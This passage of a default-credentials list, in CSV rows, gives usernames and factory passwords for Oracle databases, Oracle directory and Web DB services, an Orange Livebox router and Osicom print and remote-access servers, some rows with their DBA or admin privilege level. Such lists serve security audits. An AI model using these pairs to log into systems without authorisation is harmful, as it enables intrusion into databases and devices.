(1 is most serious),, +oracle,Database,Any,,XLA,XLA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XNC,XNC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XNI,XNI,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XNM,XNM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XNP,XNP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XNS,XNS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XPRT,XPRT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XTR,XTR,Threatcon 2 (1 is most serious),, +oracle,Internet Directory Service,,,cn=orcladmin,welcome,,, +oracle,Internet Directory Service,,,cn=orcladmin,welcome,,any, +oracle,Oracle RDBMS,,,ADAMS,WOOD,,, +oracle,Oracle RDBMS,,,APPLSYS,APPLSYS,,, +oracle,Oracle RDBMS,,,APPS,APPS,,, +oracle,Oracle RDBMS,,,AQDEMO,AQDEMO,,, +oracle,Oracle RDBMS,,,AQUSER,AQUSER,,, +oracle,Oracle RDBMS,,,AURORA$ORB$UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,,,AURORA@ORB@UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,,,BLAKE,PAPER,,, +oracle,Oracle RDBMS,,,CATALOG,CATALOG,,, +oracle,Oracle RDBMS,,,CDEMO82,CDEMO82,,, +oracle,Oracle RDBMS,,,CDEMOCOR,CDEMOCOR,,, +oracle,Oracle RDBMS,,,CDEMORID,CDEMORID,,, +oracle,Oracle RDBMS,,,CDEMOUCB,CDEMOUCB,,, +oracle,Oracle RDBMS,,,CLARK,CLOTH,,, +oracle,Oracle RDBMS,,,CTXDEMO,CTXDEMO,,, +oracle,Oracle RDBMS,,,CTXSYS,,,, +oracle,Oracle RDBMS,,,DEMO,DEMO,,, +oracle,Oracle RDBMS,,,DEMO8,DEMO8,,, +oracle,Oracle RDBMS,,,EMP,EMP,,, +oracle,Oracle RDBMS,,,FND,FND,,, +oracle,Oracle RDBMS,,,GPFD,GPFD,,, +oracle,Oracle RDBMS,,,GPLD,GPLD,,, +oracle,Oracle RDBMS,,,JONES,STEEL,,, +oracle,Oracle RDBMS,,,MILLER,MILLER,,, +oracle,Oracle RDBMS,,,MMO2,MMO2,,, +oracle,Oracle RDBMS,,,MOREAU,MOREAU,,, +oracle,Oracle RDBMS,,,MTYSYS,MTYSYS,,, +oracle,Oracle RDBMS,,,NAMES,NAMES,,, +oracle,Oracle RDBMS,,,OCITEST,OCITEST,,, +oracle,Oracle RDBMS,,,ORDPLUGINS,ORDPLUGINS,,, +oracle,Oracle RDBMS,,,ORDSYS,ORDSYS,,, +oracle,Oracle RDBMS,,,OUTLN,OUTLN,,, +oracle,Oracle RDBMS,,,POWERCARTUSER,POWERCARTUSER,,, +oracle,Oracle RDBMS,,,PRIMARY,PRIMARY,,, +oracle,Oracle RDBMS,,,RE,RE,,, +oracle,Oracle RDBMS,,,RMAIL,RMAIL,,, +oracle,Oracle RDBMS,,,RMAN,RMAN,,, +oracle,Oracle RDBMS,,,SCOTT,TIGER,,, +oracle,Oracle RDBMS,,,SECDEMO,SECDEMO,,, +oracle,Oracle RDBMS,,,SYSADM,SYSADM,,, +oracle,Oracle RDBMS,,,SYSTEM,MANAGER,,, +oracle,Oracle RDBMS,,,TRACESRV,TRACE,,, +oracle,Oracle RDBMS,,,TSDEV,TSDEV,,, +oracle,Oracle RDBMS,,,TSUSER,TSUSER,,, +oracle,Oracle RDBMS,,,USER0,USER0,,, +oracle,Oracle RDBMS,,,USER1,USER1,,, +oracle,Oracle RDBMS,,,USER2,USER2,,, +oracle,Oracle RDBMS,,,USER3,USER3,,, +oracle,Oracle RDBMS,,,USER4,USER4,,, +oracle,Oracle RDBMS,,,USER5,USER5,,, +oracle,Oracle RDBMS,,,USER6,USER6,,, +oracle,Oracle RDBMS,,,USER7,USER7,,, +oracle,Oracle RDBMS,,,USER8,USER8,,, +oracle,Oracle RDBMS,,,USER9,USER9,,, +oracle,Oracle RDBMS,,7 and 8,ADAMS,WOOD,,, +oracle,Oracle RDBMS,,7 and 8,APPLSYS,APPLSYS,,, +oracle,Oracle RDBMS,,7 and 8,APPS,APPS,,, +oracle,Oracle RDBMS,,7 and 8,AURORA$ORB$UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,,7 and 8,AURORA@ORB@UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,,7 and 8,BLAKE,PAPER,,, +oracle,Oracle RDBMS,,7 and 8,CLARK,CLOTH,,, +oracle,Oracle RDBMS,,7 and 8,CTXDEMO,CTXDEMO,,, +oracle,Oracle RDBMS,,7 and 8,CTXSYS,CTXSYS,,, +oracle,Oracle RDBMS,,7 and 8,DBSNMP,DBSNMP,,, +oracle,Oracle RDBMS,,7 and 8,DEMO,DEMO,,, +oracle,Oracle RDBMS,,7 and 8,JONES,STEEL,,, +oracle,Oracle RDBMS,,7 and 8,MDSYS,MDSYS,,, +oracle,Oracle RDBMS,,7 and 8,NAMES,NAMES,,, +oracle,Oracle RDBMS,,7 and 8,ORDPLUGINS,ORDPLUGINS,,, +oracle,Oracle RDBMS,,7 and 8,ORDSYS,ORDSYS,,, +oracle,Oracle RDBMS,,7 and 8,OUTLN,OUTLN,,, +oracle,Oracle RDBMS,,7 and 8,RMAN,RMAN,,, +oracle,Oracle RDBMS,,7 and 8,SCOTT,TIGER,,, +oracle,Oracle RDBMS,,7 and 8,SYS,CHANGE_ON_INSTALL,,, +oracle,Oracle RDBMS,,7 and 8,SYSADM,SYSADM,,, +oracle,Oracle RDBMS,,7 and 8,SYSTEM,MANAGER,,, +oracle,Oracle RDBMS,,7 and 8,TRACESRV,TRACE,,, +oracle,Oracle RDBMS,,8i Linux,MODTEST,YES,,, +oracle,Oracle RDBMS,,8i WinNT,MTYSYS,MTYSYS,,, +oracle,Oracle RDBMS,,8i WinNT,RE,RE,,, +oracle,Oracle RDBMS,,8i WinNT,RMAIL,RMAIL,,, +oracle,Oracle RDBMS,,8i WinNT,SAMPLE,SAMPLE,,, +oracle,Oracle RDBMS,,8i,AQDEMO,AQDEMO,,, +oracle,Oracle RDBMS,,8i,AQUSER,AQUSER,,, +oracle,Oracle RDBMS,,8i,CATALOG,CATALOG,,, +oracle,Oracle RDBMS,,8i,CDEMO82,CDEMO82,,, +oracle,Oracle RDBMS,,8i,CDEMOCOR,CDEMOCOR,,, +oracle,Oracle RDBMS,,8i,CDEMORID,CDEMORID,,, +oracle,Oracle RDBMS,,8i,CDEMOUCB,CDEMOUCB,,, +oracle,Oracle RDBMS,,8i,COMPANY,COMPANY,,, +oracle,Oracle RDBMS,,8i,DEMO8,DEMO8,,, +oracle,Oracle RDBMS,,8i,EMP,EMP,,, +oracle,Oracle RDBMS,,8i,EVENT,EVENT,,, +oracle,Oracle RDBMS,,8i,FINANCE,FINANCE,,, +oracle,Oracle RDBMS,,8i,FND,FND,,, +oracle,Oracle RDBMS,,8i,GPFD,GPFD,,, +oracle,Oracle RDBMS,,8i,GPLD,GPLD,,, +oracle,Oracle RDBMS,,8i,MFG,MFG,,, +oracle,Oracle RDBMS,,8i,MILLER,MILLER,,, +oracle,Oracle RDBMS,,8i,MMO2,MMO2,,, +oracle,Oracle RDBMS,,8i,MOREAU,MOREAU,,, +oracle,Oracle RDBMS,,8i,OCITEST,OCITEST,,, +oracle,Oracle RDBMS,,8i,PO,PO,,, +oracle,Oracle RDBMS,,8i,POWERCARTUSER,POWERCARTUSER,,, +oracle,Oracle RDBMS,,8i,PRIMARY,PRIMARY,,, +oracle,Oracle RDBMS,,8i,PUBSUB,PUBSUB,,, +oracle,Oracle RDBMS,,8i,SECDEMO,SECDEMO,,, +oracle,Oracle RDBMS,,8i,SYSMAN,oem_temp,,, +oracle,Oracle RDBMS,,8i,TSDEV,TSDEV,,, +oracle,Oracle RDBMS,,8i,TSUSER,TSUSER,,, +oracle,Oracle RDBMS,,8i,USER0,USER0,,, +oracle,Oracle RDBMS,,8i,USER1,USER1,,, +oracle,Oracle RDBMS,,8i,USER2,USER2,,, +oracle,Oracle RDBMS,,8i,USER3,USER3,,, +oracle,Oracle RDBMS,,8i,USER4,USER4,,, +oracle,Oracle RDBMS,,8i,USER5,USER5,,, +oracle,Oracle RDBMS,,8i,USER6,USER6,,, +oracle,Oracle RDBMS,,8i,USER7,USER7,,, +oracle,Oracle RDBMS,,8i,USER8,USER8,,, +oracle,Oracle RDBMS,,8i,USER9,USER9,,, +oracle,Oracle RDBMS,,8i,VRR1,VRR1,,, +oracle,Oracle RDBMS,,All Privileges with Admin,MDSYS,MDSYS,,, +oracle,Oracle RDBMS,,All Privileges,COMPANY,COMPANY,,, +oracle,Oracle RDBMS,,All Privileges,FINANCE,FINANCE,,, +oracle,Oracle RDBMS,,All Privileges,MFG,MFG,,, +oracle,Oracle RDBMS,,DBA +,SYS,CHANGE_ON_INSTALL,,, +oracle,Oracle RDBMS,,DBA,CTXSYS,CTXSYS,,, +oracle,Oracle RDBMS,,DBA,EVENT,EVENT,,, +oracle,Oracle RDBMS,,DBA,MODTEST,YES,,, +oracle,Oracle RDBMS,,DBA,PO,PO,,, +oracle,Oracle RDBMS,,DBA,PUBSUB,PUBSUB,,, +oracle,Oracle RDBMS,,DBA,SAMPLE,SAMPLE,,, +oracle,Oracle RDBMS,,DBA,SYSMAN,oem_temp,,, +oracle,Oracle RDBMS,,DBA,VRR1,VRR1,,, +oracle,Oracle RDBMS,,RESOURCE and CONNECT roles,DBSNMP,DBSNMP,,, +oracle,Oracle RDBMS,7 and 8,Multi,ADAMS,WOOD,,, +oracle,Oracle RDBMS,7 and 8,Multi,APPLSYS,APPLSYS,,, +oracle,Oracle RDBMS,7 and 8,Multi,APPS,APPS,,, +oracle,Oracle RDBMS,7 and 8,Multi,AURORA$ORB$UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,7 and 8,Multi,AURORA@ORB@UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,7 and 8,Multi,BLAKE,PAPER,,, +oracle,Oracle RDBMS,7 and 8,Multi,CLARK,CLOTH,,, +oracle,Oracle RDBMS,7 and 8,Multi,CTXDEMO,CTXDEMO,,, +oracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,,,, +oracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,CTXSYS,DBA,, +oracle,Oracle RDBMS,7 and 8,Multi,DBSNMP,DBSNMP,RESOURCE and CONNECT roles,, +oracle,Oracle RDBMS,7 and 8,Multi,DEMO,DEMO,,, +oracle,Oracle RDBMS,7 and 8,Multi,JONES,STEEL,,, +oracle,Oracle RDBMS,7 and 8,Multi,MDSYS,MDSYS,All Privileges with Admin,, +oracle,Oracle RDBMS,7 and 8,Multi,NAMES,NAMES,,, +oracle,Oracle RDBMS,7 and 8,Multi,ORDPLUGINS,ORDPLUGINS,,, +oracle,Oracle RDBMS,7 and 8,Multi,ORDSYS,ORDSYS,,, +oracle,Oracle RDBMS,7 and 8,Multi,OUTLN,OUTLN,,, +oracle,Oracle RDBMS,7 and 8,Multi,RMAN,RMAN,,, +oracle,Oracle RDBMS,7 and 8,Multi,SCOTT,TIGER,,, +oracle,Oracle RDBMS,7 and 8,Multi,SYS,CHANGE_ON_INSTALL,DBA +,, +oracle,Oracle RDBMS,7 and 8,Multi,SYSADM,SYSADM,,, +oracle,Oracle RDBMS,7 and 8,Multi,SYSTEM,MANAGER,,, +oracle,Oracle RDBMS,7 and 8,Multi,TRACESRV,TRACE,,, +oracle,Oracle RDBMS,8i Linux,Multi,MODTEST,YES,DBA,, +oracle,Oracle RDBMS,8i WinNT,Multi,MTYSYS,MTYSYS,,, +oracle,Oracle RDBMS,8i WinNT,Multi,RE,RE,,, +oracle,Oracle RDBMS,8i WinNT,Multi,RMAIL,RMAIL,,, +oracle,Oracle RDBMS,8i WinNT,Multi,SAMPLE,SAMPLE,DBA,, +oracle,Oracle RDBMS,8i,Multi,AQDEMO,AQDEMO,,, +oracle,Oracle RDBMS,8i,Multi,AQUSER,AQUSER,,, +oracle,Oracle RDBMS,8i,Multi,CATALOG,CATALOG,,, +oracle,Oracle RDBMS,8i,Multi,CDEMO82,CDEMO82,,, +oracle,Oracle RDBMS,8i,Multi,CDEMOCOR,CDEMOCOR,,, +oracle,Oracle RDBMS,8i,Multi,CDEMORID,CDEMORID,,, +oracle,Oracle RDBMS,8i,Multi,CDEMOUCB,CDEMOUCB,,, +oracle,Oracle RDBMS,8i,Multi,COMPANY,COMPANY,All Privileges,, +oracle,Oracle RDBMS,8i,Multi,DEMO8,DEMO8,,, +oracle,Oracle RDBMS,8i,Multi,EMP,EMP,,, +oracle,Oracle RDBMS,8i,Multi,EVENT,EVENT,DBA,, +oracle,Oracle RDBMS,8i,Multi,FINANCE,FINANCE,All Privileges,, +oracle,Oracle RDBMS,8i,Multi,FND,FND,,, +oracle,Oracle RDBMS,8i,Multi,GPFD,GPFD,,, +oracle,Oracle RDBMS,8i,Multi,GPLD,GPLD,,, +oracle,Oracle RDBMS,8i,Multi,MFG,MFG,All Privileges,, +oracle,Oracle RDBMS,8i,Multi,MILLER,MILLER,,, +oracle,Oracle RDBMS,8i,Multi,MMO2,MMO2,,, +oracle,Oracle RDBMS,8i,Multi,MOREAU,MOREAU,,, +oracle,Oracle RDBMS,8i,Multi,OCITEST,OCITEST,,, +oracle,Oracle RDBMS,8i,Multi,PO,PO,DBA,, +oracle,Oracle RDBMS,8i,Multi,POWERCARTUSER,POWERCARTUSER,,, +oracle,Oracle RDBMS,8i,Multi,PRIMARY,PRIMARY,,, +oracle,Oracle RDBMS,8i,Multi,PUBSUB,PUBSUB,DBA,, +oracle,Oracle RDBMS,8i,Multi,SECDEMO,SECDEMO,,, +oracle,Oracle RDBMS,8i,Multi,SYSMAN,oem_temp,DBA,, +oracle,Oracle RDBMS,8i,Multi,TSDEV,TSDEV,,, +oracle,Oracle RDBMS,8i,Multi,TSUSER,TSUSER,,, +oracle,Oracle RDBMS,8i,Multi,USER0,USER0,,, +oracle,Oracle RDBMS,8i,Multi,USER1,USER1,,, +oracle,Oracle RDBMS,8i,Multi,USER2,USER2,,, +oracle,Oracle RDBMS,8i,Multi,USER3,USER3,,, +oracle,Oracle RDBMS,8i,Multi,USER4,USER4,,, +oracle,Oracle RDBMS,8i,Multi,USER5,USER5,,, +oracle,Oracle RDBMS,8i,Multi,USER6,USER6,,, +oracle,Oracle RDBMS,8i,Multi,USER7,USER7,,, +oracle,Oracle RDBMS,8i,Multi,USER8,USER8,,, +oracle,Oracle RDBMS,8i,Multi,USER9,USER9,,, +oracle,Oracle RDBMS,8i,Multi,VRR1,VRR1,DBA,, +oracle,Oracle RDBMS,Any,Multi,system/manager,sys/change_on_install,Admin,, +oracle,Oracle,,,ADAMS,WOOD,,, +oracle,Oracle,,,ADLDEMO,ADLDEMO,,, +oracle,Oracle,,,ADMIN,JETSPEED,,, +oracle,Oracle,,,ADMINISTRATOR,ADMINISTRATOR,,, +oracle,Oracle,,,ANDY,SWORDFISH,,, +oracle,Oracle,,,AP,AP,,, +oracle,Oracle,,,APPLSYS,FND,,, +oracle,Oracle,,,APPLSYSPUB,FNDPUB,,, +oracle,Oracle,,,APPS,APPS,,, +oracle,Oracle,,,APPUSER,APPUSER,,, +oracle,Oracle,,,AQ,AQ,,, +oracle,Oracle,,,AQDEMO,AQDEMO,,, +oracle,Oracle,,,AQJAVA,AQJAVA,,, +oracle,Oracle,,,AQUSER,AQUSER,,, +oracle,Oracle,,,AUDIOUSER,AUDIOUSER,,, +oracle,Oracle,,,AURORA$JIS$UTILITY$,,,, +oracle,Oracle,,,AURORA$ORB$UNAUTHENTICATED,INVALID,,, +oracle,Oracle,,,BC4J,BC4J,,, +oracle,Oracle,,,BLAKE,PAPER,,, +oracle,Oracle,,,BRIO_ADMIN,BRIO_ADMIN,,, +oracle,Oracle,,,CATALOG,CATALOG,,, +oracle,Oracle,,,CDEMO82,CDEMO82,,, +oracle,Oracle,,,CDEMOCOR,CDEMOCOR,,, +oracle,Oracle,,,CDEMORID,CDEMORID,,, +oracle,Oracle,,,CDEMOUCB,CDEMOUCB,,, +oracle,Oracle,,,CENTRA,CENTRA,,, +oracle,Oracle,,,CIDS,CIDS,,, +oracle,Oracle,,,CIS,CIS,,, +oracle,Oracle,,,CISINFO,CISINFO,,, +oracle,Oracle,,,CLARK,CLOTH,,, +oracle,Oracle,,,COMPANY,COMPANY,,, +oracle,Oracle,,,COMPIERE,COMPIERE,,, +oracle,Oracle,,,CQSCHEMAUSER,PASSWORD,,, +oracle,Oracle,,,CSMIG,CSMIG,,, +oracle,Oracle,,,CTXDEMO,CTXDEMO,,, +oracle,Oracle,,,CTXSYS,CTXSYS,,, +oracle,Oracle,,,DBI,MUMBLEFRATZ,,, +oracle,Oracle,,,DBSNMP,DBSNMP,,, +oracle,Oracle,,,DEMO8,DEMO8,,, +oracle,Oracle,,,DEMO9,DEMO9,,, +oracle,Oracle,,,DES,DES,,, +oracle,Oracle,,,DEV2000_DEMOS,DEV2000_DEMOS,,, +oracle,Oracle,,,DIP,DIP,,, +oracle,Oracle,,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,,, +oracle,Oracle,,,DSGATEWAY,DSGATEWAY,,, +oracle,Oracle,,,DSSYS,DSSYS,,, +oracle,Oracle,,,EJSADMIN,EJSADMIN,,, +oracle,Oracle,,,EMP,EMP,,, +oracle,Oracle,,,ESTOREUSER,ESTORE,,, +oracle,Oracle,,,EVENT,EVENT,,, +oracle,Oracle,,,EXFSYS,EXFSYS,,, +oracle,Oracle,,,FINANCE,FINANCE,,, +oracle,Oracle,,,FND,FND,,, +oracle,Oracle,,,FROSTY,SNOWMAN,,, +oracle,Oracle,,,GL,GL,,, +oracle,Oracle,,,GPFD,GPFD,,, +oracle,Oracle,,,GPLD,GPLD,,, +oracle,Oracle,,,HCPARK,HCPARK,,, +oracle,Oracle,,,HLW,HLW,,, +oracle,Oracle,,,HR,HR,,, +oracle,Oracle,,,IMAGEUSER,IMAGEUSER,,, +oracle,Oracle,,,IMEDIA,IMEDIA,,, +oracle,Oracle,,,JMUSER,JMUSER,,, +oracle,Oracle,,,JONES,STEEL,,, +oracle,Oracle,,,JWARD,AIROPLANE,,, +oracle,Oracle,,,L2LDEMO,L2LDEMO,,, +oracle,Oracle,,,LBACSYS,LBACSYS,,, +oracle,Oracle,,,LIBRARIAN,SHELVES,,, +oracle,Oracle,,,MASTER,PASSWORD,,, +oracle,Oracle,,,MDDEMO,MDDEMO,,, +oracle,Oracle,,,MDDEMO_CLERK,CLERK,,, +oracle,Oracle,,,MDDEMO_MGR,MGR,,, +oracle,Oracle,,,MDSYS,MDSYS,,, +oracle,Oracle,,,MFG,MFG,,, +oracle,Oracle,,,MGWUSER,MGWUSER,,, +oracle,Oracle,,,MIGRATE,MIGRATE,,, +oracle,Oracle,,,MILLER,MILLER,,, +oracle,Oracle,,,MMO2,MMO2,,, +oracle,Oracle,,,MODTEST,YES,,, +oracle,Oracle,,,MOREAU,MOREAU,,, +oracle,Oracle,,,MTSSYS,MTSSYS,,, +oracle,Oracle,,,MTS_USER,MTS_PASSWORD,,, +oracle,Oracle,,,MXAGENT,MXAGENT,,, +oracle,Oracle,,,NAMES,NAMES,,, +oracle,Oracle,,,OAS_PUBLIC,OAS_PUBLIC,,, +oracle,Oracle,,,OCITEST,OCITEST,,, +oracle,Oracle,,,ODM,ODM,,, +oracle,Oracle,,,ODM_MTR,MTRPW,,, +oracle,Oracle,,,ODS,ODS,,, +oracle,Oracle,,,ODSCOMMON,ODSCOMMON,,, +oracle,Oracle,,,OE,OE,,, +oracle,Oracle,,,OEMADM,OEMADM,,, +oracle,Oracle,,,OEMREP,OEMREP,,, +oracle,Oracle,,,OLAPDBA,OLAPDBA,,, +oracle,Oracle,,,OLAPSVR,INSTANCE,,, +oracle,Oracle,,,OLAPSYS,MANAGER,,, +oracle,Oracle,,,OMWB_EMULATION,ORACLE,,, +oracle,Oracle,,,OO,OO,,, +oracle,Oracle,,,OPENSPIRIT,OPENSPIRIT,,, +oracle,Oracle,,,ORACACHE,(random password),,, +oracle,Oracle,,,ORAREGSYS,ORAREGSYS,,, +oracle,Oracle,,,ORASSO,ORASSO,,, +oracle,Oracle,,,ORDPLUGINS,ORDPLUGINS,,, +oracle,Oracle,,,ORDSYS,ORDSYS,,, +oracle,Oracle,,,OSE$HTTP$ADMIN,(random password),,, +oracle,Oracle,,,OSP22,OSP22,,, +oracle,Oracle,,,OUTLN,OUTLN,,, +oracle,Oracle,,,OWA,OWA,,, +oracle,Oracle,,,OWA_PUBLIC,OWA_PUBLIC,,, +oracle,Oracle,,,OWNER,OWNER,,, +oracle,Oracle,,,PANAMA,PANAMA,,, +oracle,Oracle,,,PATROL,PATROL,,, +oracle,Oracle,,,PERFSTAT,PERFSTAT,,, +oracle,Oracle,,,PLEX,PLEX,,, +oracle,Oracle,,,PLSQL,SUPERSECRET,,, +oracle,Oracle,,,PM,PM,,, +oracle,Oracle,,,PO,PO,,, +oracle,Oracle,,,PO7,PO7,,, +oracle,Oracle,,,PORTAL30,PORTAL30,,, +oracle,Oracle,,,PORTAL30_DEMO,PORTAL30_DEMO,,, +oracle,Oracle,,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,,, +oracle,Oracle,,,PORTAL30_SSO,PORTAL30_SSO,,, +oracle,Oracle,,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,,, +oracle,Oracle,,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,,, +oracle,Oracle,,,POWERCARTUSER,POWERCARTUSER,,, +oracle,Oracle,,,PRIMARY,PRIMARY,,, +oracle,Oracle,,,PUBSUB,PUBSUB,,, +oracle,Oracle,,,PUBSUB1,PUBSUB1,,, +oracle,Oracle,,,QDBA,QDBA,,, +oracle,Oracle,,,QS,QS,,, +oracle,Oracle,,,QS_ADM,QS_ADM,,, +oracle,Oracle,,,QS_CB,QS_CB,,, +oracle,Oracle,,,QS_CBADM,QS_CBADM,,, +oracle,Oracle,,,QS_CS,QS_CS,,, +oracle,Oracle,,,QS_ES,QS_ES,,, +oracle,Oracle,,,QS_OS,QS_OS,,, +oracle,Oracle,,,QS_WS,QS_WS,,, +oracle,Oracle,,,RE,RE,,, +oracle,Oracle,,,REPADMIN,REPADMIN,,, +oracle,Oracle,,,REPORTS_USER,OEM_TEMP,,, +oracle,Oracle,,,REP_MANAGER,DEMO,,, +oracle,Oracle,,,REP_OWNER,REP_OWNER,,, +oracle,Oracle,,,RMAIL,RMAIL,,, +oracle,Oracle,,,RMAN,RMAN,,, +oracle,Oracle,,,SAMPLE,SAMPLE,,, +oracle,Oracle,,,SAP,SAPR3,,, +oracle,Oracle,,,SDOS_ICSAP,SDOS_ICSAP,,, +oracle,Oracle,,,SECDEMO,SECDEMO,,, +oracle,Oracle,,,SERVICECONSUMER1,SERVICECONSUMER1,,, +oracle,Oracle,,,SH,SH,,, +oracle,Oracle,,,SITEMINDER,SITEMINDER,,, +oracle,Oracle,,,SLIDE,SLIDEPW,,, +oracle,Oracle,,,STARTER,STARTER,,, +oracle,Oracle,,,STRAT_USER,STRAT_PASSWD,,, +oracle,Oracle,,,SWPRO,SWPRO,,, +oracle,Oracle,,,SWUSER,SWUSER,,, +oracle,Oracle,,,SYMPA,SYMPA,,, +oracle,Oracle,,,SYS,D_SYSPW,,, +oracle,Oracle,,,SYSADM,SYSADM,,, +oracle,Oracle,,,SYSMAN,OEM_TEMP,,, +oracle,Oracle,,,SYSTEM,D_SYSTPW,,, +oracle,Oracle,,,TAHITI,TAHITI,,, +oracle,Oracle,,,TDOS_ICSAP,TDOS_ICSAP,,, +oracle,Oracle,,,TESTPILOT,TESTPILOT,,, +oracle,Oracle,,,TRACESVR,TRACE,,, +oracle,Oracle,,,TRAVEL,TRAVEL,,, +oracle,Oracle,,,TSDEV,TSDEV,,, +oracle,Oracle,,,TSUSER,TSUSER,,, +oracle,Oracle,,,TURBINE,TURBINE,,, +oracle,Oracle,,,ULTIMATE,ULTIMATE,,, +oracle,Oracle,,,USER,USER,,, +oracle,Oracle,,,USER0,USER0,,, +oracle,Oracle,,,USER1,USER1,,, +oracle,Oracle,,,USER2,USER2,,, +oracle,Oracle,,,USER3,USER3,,, +oracle,Oracle,,,USER4,USER4,,, +oracle,Oracle,,,USER5,USER5,,, +oracle,Oracle,,,USER6,USER6,,, +oracle,Oracle,,,USER7,USER7,,, +oracle,Oracle,,,USER8,USER8,,, +oracle,Oracle,,,USER9,USER9,,, +oracle,Oracle,,,UTLBSTATU,UTLESTAT,,, +oracle,Oracle,,,VIDEOUSER,VIDEO USER,,, +oracle,Oracle,,,VIF_DEVELOPER,VIF_DEV_PWD,,, +oracle,Oracle,,,VIRUSER,VIRUSER,,, +oracle,Oracle,,,VRR1,VRR1,,, +oracle,Oracle,,,WEBCAL01,WEBCAL01,,, +oracle,Oracle,,,WEBDB,WEBDB,,, +oracle,Oracle,,,WEBREAD,WEBREAD,,, +oracle,Oracle,,,WKSYS,WKSYS,,, +oracle,Oracle,,,WWW,WWW,,, +oracle,Oracle,,,WWWUSER,WWWUSER,,, +oracle,Oracle,,,XPRT,XPRT,,, +oracle,Oracle,,,demo,demo,,, +oracle,Oracle,,,internal,oracle,,, +oracle,Oracle,,,oracle,oracle,,, +oracle,Oracle,,,scott,tiger or tigger,,, +oracle,Oracle,,,sys,sys,,, +oracle,Oracle,,,system,manager,,, +oracle,Personal Oracle,,,PO8,PO8,,, +oracle,Personal Oracle,,8,PO8,PO8,,, +oracle,Personal Oracle,8,Multi,PO8,PO8,,, +oracle,Web DB,,,webdb,webdb,,, +oracle,Web DB,,Admin,webdb,webdb,,, +oracle,Web DB,,HTTP,webdb,webdb,Admin,, +orange,livebox,,,admin,admin,,, +osicom,JETXPrint,,1000E/B,sysadm,sysadm,,, +osicom,JETXPrint,,1000E/N,sysadm,sysadm,,, +osicom,JETXPrint,,1000T/N,sysadm,sysadm,,, +osicom,JETXPrint,,500 E/B,sysadm,sysadm,,, +osicom,JETXPrint,,Admin,sysadm,sysadm,,, +osicom,JETXPrint,1000E/B,Telnet,sysadm,sysadm,Admin,, +osicom,JETXPrint,1000E/N,Telnet,sysadm,sysadm,Admin,, +osicom,JETXPrint,1000T/N,Telnet,sysadm,sysadm,Admin,, +osicom,JETXPrint,500 E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETCommuter Remote Access Server,,,Manager,Manager,,, +osicom,NETCommuter Remote Access Server,,,debug,d.e.b.u.g,,, +osicom,NETCommuter Remote Access Server,,,echo,echo,,, +osicom,NETCommuter Remote Access Server,,,guest,guest,,, +osicom,NETCommuter Remote Access Server,,,sysadm,sysadm,,, +osicom,NETCommuter Remote Access Server,,Admin,Manager,Manager,,, +osicom,NETCommuter Remote Access Server,,Admin,sysadm,sysadm,,, +osicom,NETCommuter Remote Access Server,,Telnet,Manager,Manager,Admin,, +osicom,NETCommuter Remote Access Server,,Telnet,debug,d.e.b.u.g,User,, +osicom,NETCommuter Remote Access Server,,Telnet,echo,echo,User,, +osicom,NETCommuter Remote Access Server,,Telnet,guest,guest,User,, +osicom,NETCommuter Remote Access Server,,Telnet,sysadm,sysadm,Admin,, +osicom,NETCommuter Remote Access Server,,User,debug,d.e.b.u.g,,, +osicom,NETCommuter Remote Access Server,,User,echo,echo,,, +osicom,NETCommuter Remote Access Server,,User,guest,guest,,, +osicom,NETPrint and JETX Print,500 1000 1500 and 2000 Series,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,,1000 T/B,sysadm,sysadm,,, +osicom,NETPrint,,1000 T/N,sysadm,sysadm,,, +osicom,NETPrint,,1000E/B,sysadm,sysadm,,, +osicom,NETPrint,,1000E/D,Manager,Manager,,, +osicom,NETPrint,,1000E/D,debug,d.e.b.u.g,,, +osicom,NETPrint,,1000E/D,echo,echo,,, +osicom,NETPrint,,1000E/D,guest,guest,,, +osicom,NETPrint,,1000E/D,sysadm,sysadm,,, +osicom,NETPrint,,1000E/N,sysadm,sysadm,,, +osicom,NETPrint,,1000E/NDS,Manager,Manager,,, +osicom,NETPrint,,1000E/NDS,debug,d.e.b.u.g,,, +osicom,NETPrint,,1000E/NDS,echo,echo,,, +osicom,NETPrint,,1000E/NDS,guest,guest,,, +osicom,NETPrint,,1000E/NDS,sysadm,sysadm,,, +osicom,NETPrint,,1500 E/B,Manager,Manager,,, +osicom,NETPrint,,1500 E/B,debug,d.e.b.u.g,,, +osicom,NETPrint,,1500 E/B,echo,echo,,, +osicom,NETPrint,,1500 E/B,guest,guest,,, +osicom,NETPrint,,1500 E/B,sysadm,sysadm,,, +osicom,NETPrint,,1500E/N,Manager,Manager,,, +osicom,NETPrint,,1500E/N,debug,d.e.b.u.g,,, +osicom,NETPrint,,1500E/N,echo,echo,,, +osicom,NETPrint,,1500E/N,guest,guest,,, +osicom,NETPrint,,1500E/N,sysadm,sysadm,,, +osicom,NETPrint,,1500T/N,sysadm,sysadm,,, +osicom,NETPrint,,2000 T/B,sysadm,sysadm,,, +osicom,NETPrint,,2000 T/N,sysadm,sysadm,,, +osicom,NETPrint,,2000E/B,sysadm,sysadm,,, +osicom,NETPrint,,2000E/N,Manager,Manager,,, +osicom,NETPrint,,2000E/N,debug,d.e.b.u.g,,, +osicom,NETPrint,,2000E/N,echo,echo,,, +osicom,NETPrint,,2000E/N,guest,guest,,, +osicom,NETPrint,,2000E/N,sysadm,sysadm,,, +osicom,NETPrint,,500 E/B,sysadm,sysadm,,, +osicom,NETPrint,,500 E/N,sysadm,sysadm,,, +osicom,NETPrint,,500 T/B,sysadm,sysadm,,, +osicom,NETPrint,,500 